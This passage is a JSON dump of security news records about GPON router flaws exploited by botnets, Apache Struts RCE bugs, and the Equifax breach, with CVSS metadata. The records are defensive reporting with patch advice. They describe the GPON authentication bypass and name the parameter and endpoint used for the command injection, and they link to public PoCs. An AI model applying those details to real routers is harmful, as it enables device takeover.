[Hajime](<https://thehackernews.com/2017/04/vigilante-hacker-iot-botnet_26.html>), has also been found adding GPON exploit to its code to target hundreds of thousands of home routers.\n * **Satori Botnet ** \u2014 The infamous botnet that infected 260,000 devices in just 12 hours last year, [Satori](<https://thehackernews.com/2017/12/satori-mirai-iot-botnet.html>) (also known as Okiru) has also been observed to include GPON exploit in its latest variant.\n \nResearchers at vpnMentor, who discovered GPON vulnerabilities, already reported the issues to the router manufacturer, but the company hasn't yet released any fix for the issues, neither researchers believe that any patch is under development, leaving millions of their customers open to these botnet operators. \n \n**What's worse?** A working [proof-of-concept (PoC) exploit](<https://github.com/f3d0x0/GPON>) for GPON router vulnerabilities has already been made available to the public, making its exploitation easier for even unskilled hackers. \n \nSo, until the company releases an official patch, users can protect their devices by disabling remote administration rights and using a firewall to prevent outside access from the public Internet. \n \nMaking these changes to your vulnerable routers would restrict access to the local network only, within the range of your Wi-Fi network, thus effectively reducing the attack surface by eliminating remote attackers. \n \nIf you are unsure about these settings, vpnMentor has also provided a [simple online tool](<https://thehackernews.com/2018/05/protect-router-hacking.html>) that automatically modifies your router settings on your behalf, though we do not encourage users to run any third-party scripts or patches on their devices. \n \nInstead, users should either wait for official fixes by the router manufacturer or apply changes manually, when possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-10T14:38:00", "type": "thn", "title": "5 Powerful Botnets Found Exploiting Unpatched GPON Router Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-05-10T14:38:12", "id": "THN:9C8C2D4F8CFDDE01FAE5FF52244A5073", "href": "https://thehackernews.com/2018/05/botnet-malware-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[![apache struts vulnerability hacking](https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png)](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[![apache struts vulnerability exploit](https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png)](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[![apache struts exploit poc rce vulnerability](https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png)](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:16", "description": "[![New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild](https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png)](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[![apache-exploit-code](https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png)](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[![apache-exploit](https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png)](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:51", "description": "[![consumer credit reporting Equifax data breach](https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg)](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[![equifax-credit-security-breach](https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png)](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:04", "description": "UPDATE\n\nConsumers lucky enough to have blazing-fast 1Gbps internet access in their homes are likely to use the internet more than lower-broadband households; however, millions of them are at risk for hackers to gain wide-ranging access to their internet activities (including being able to view full browsing histories).\n\nA comprehensive [assessment](<https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/>) of various GPON home routers by vpnMentor has uncovered a way to bypass all authentication on the devices (CVE-2018-10561). That flaw can be found within the HTTP servers on GPON networks, which check for specific paths when authenticating the router. The attacker can bypass authentication by simply affixing an image suffix to the URL.\n\nEven worse, thanks to the initial authentication bypass, vpnMentor researchers were also able to find a command injection vulnerability (CVE-2018-10562) to execute commands on the device.\n\n\u201cDuring our analysis of GPON firmware, we found two different critical vulnerabilities that could, when combined, allow complete control on the device and therefore the user\u2019s [home network],\u201d the firm said.\n\nSince this post was originally posted a [patch](<https://www.vpnmentor.com/tools/gpon-router-antidote-patch/>) is now available for this issue. In a statement the company said: \u201cIt is critical that users know about [the patch](<https://www.vpnmentor.com/tools/gpon-router-antidote-patch/>) and can use it to fix their routers,\u201d vpnMentor said. \u201cWe created a tool that allows them to do this, even if they don\u2019t have a technical background.\u201d\n\nResearchers originally said of the vulnerability: \u201cWhile looking through the device functionalities, we noticed the diagnostic endpoint contained the ping and traceroute commands. It didn\u2019t take much to figure out that the commands can be injected by the host parameter. Since the router saves ping results\u2026and transmits [them] to the user\u2026it\u2019s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.\u201d\n\nNot only can attackers use the vulnerabilities to see the IP address of specific routers, matching them to physical addresses in some cases, but they can also see what the user is doing on the web. Further, they can also set up specially crafted man-in-the-middle (MiTM) phishing pages to harvest credentials.\n\nAnd that\u2019s not all. \u201cThere\u2019s a privacy aspect here too,\u201d explained Ariel Hochstadt, co-founder of vpnMentor, in an interview. \u201cIt\u2019s possible to take an entire browsing history for someone from the last 30 days and send it to all of their friends, via Facebook or mail, because you have access to the browsing history and you can skim credentials.\u201d\n\n[GPON](<http://www.gpon.com/>) is a fiber-based passive optical network (PON) that supports 1Gbps broadband to the home. It isn\u2019t the most common type of ISP network in the U.S., given that fiber-to-the-home (FTTH) deployments are limited as yet. However, it\u2019s commonly seen as the future of broadband, as consumers demand ever-more bandwidth to support video streaming and other activities. In some countries, like Mexico, it has become mainstream.\n\nvpnMentor [posted a video](<https://youtu.be/2tgRJa58jY0>) showing millions of vulnerable routers discoverable on Shodan.\n\n\u201cWe tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them,\u201d the vpnMentor researchers said. \u201cBecause so many people use these types of routers, this vulnerability can result in an entire network compromise.\u201d\n\nGPON customers should also contact their ISPs about updates, Hochstadt added.\n", "cvss3": {}, "published": "2018-05-01T21:21:14", "type": "threatpost", "title": "Millions of Home Fiber Routers Vulnerable to Complete Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-05-01T21:21:14", "id": "THREATPOST:CB1132219D5713747CDA17DB009B4B24", "href": "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:52:08", "description": "Unpatched D-Link and Dasan GPON router vulnerabilities are being targeted by hackers attempting to build a botnet army, according to research [published Friday by eSentire Threat Intelligence](<https://www.esentire.com/news-and-events/security-advisories/increase-in-attacks-on-gpon-routers/>).\n\nResearchers observed on Thursday a massive uptick in exploit attempts from over 3,000 different source IPs targeting model D-Link 2750B and Dasan GPON routers running a version of the GPON firmware.\n\n[![D-Link DSL-2750B](https://media.threatpost.com/wp-content/uploads/sites/103/2018/07/20155743/dlink_DSL_router.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/07/20155743/dlink_DSL_router.jpg>)\n\nD-Link DSL-2750B\n\n\u201cA successful recruitment campaign has the potential to arm the associated threat actor(s) with DDoS artillery and facilitate espionage of private browsing habits,\u201d wrote Keegan Keplinger, threat intelligence researcher with eSentire. \u201cBotnets built using compromised routers may eventually be offered as a service to other threat actors, used for extorting DDoS victims among other uses.\u201d\n\nIn an interview with Keplinger, he said the sustained attacks lasted 10 hours on Thursday. He said an unspecified single actor was targeting a known command-injection bug (CVE-2018-10562) used in routers running the GPON firmware version ZIND-GPON-25xx.\n\n\u201cCommand injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it\u2019s quite simple to execute commands and retrieve their output,\u201d the [CVE description of the vulnerability](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10562>) explained.\n\nThis vulnerability is no stranger to attacks. In May, researchers at Qihoo 360\u2019s Netlab reported 1 million Dasan GPON routers were being targeted by attackers hoping to exploit CVE-2018-10562 and [CVE-2018-10561](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10561>). Several days later researchers at vpnMentor, [which also tracked the attack](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>), offered [patches for both vulnerabilities](<https://www.vpnmentor.com/tools/gpon-router-antidote-patch/>).\n\n> It did not take long for miscreant to spot and add this to their weapon library, we have captured activity utilizing CVE-2018-10561 CVE-2018-10562 with an active C2 up and running in VN. We will share more details soon. <https://t.co/I7lE3gRWr5>\n> \n> \u2014 360 Netlab (@360Netlab) [May 3, 2018](<https://twitter.com/360Netlab/status/992111707416915969?ref_src=twsrc%5Etfw>)\n\nToday, researchers at Palo Alto\u2019s Unit 42 also revealed separate Mirai and Gafgyt IoT/Linux botnet campaigns that occurred that month, exploiting both the CVE-2018-10562 and CVE-2018-10561 bugs.\n\n\u201cThe end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices,\u201d [wrote Ruchna Nigam](<https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/>), senior threat researcher with Unit 42.\n\nESentire\u2019s Keplinger told Threatpost the activity observed this week came from more than 3,000 IPs located in Egypt and coordinated by a single-source command-and-contril that is unknown. No specific industry or geography is being singled out, he said.\n\n\u201cA sample of packets from various source IPs involved in this event pointed to a single C2 server hosting malware that appeared. VirusTotal results for the malware indicated similarities with the Mirai botnet. Variants of Mirai code have been spotted in the Satori botnet,\u201d according to [a breakdown of the attacks by Keplinger](<https://www.esentire.com/blog/esentire-observes-an-increase-in-exploitation-attempts-against-routers/>).\n\nKeplinger recommends users of the effected routers \u201cdisable remote access, ensure default login credentials are not being used, and disable universal plug and play capabilities.\u201d\n", "cvss3": {}, "published": "2018-07-20T20:24:12", "type": "threatpost", "title": "D-Link, Dasan Routers Under Attack In Yet Another Assault", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-07-20T20:24:12", "id": "THREATPOST:54ECD02964DEF33573316A94BCE772BD", "href": "https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of 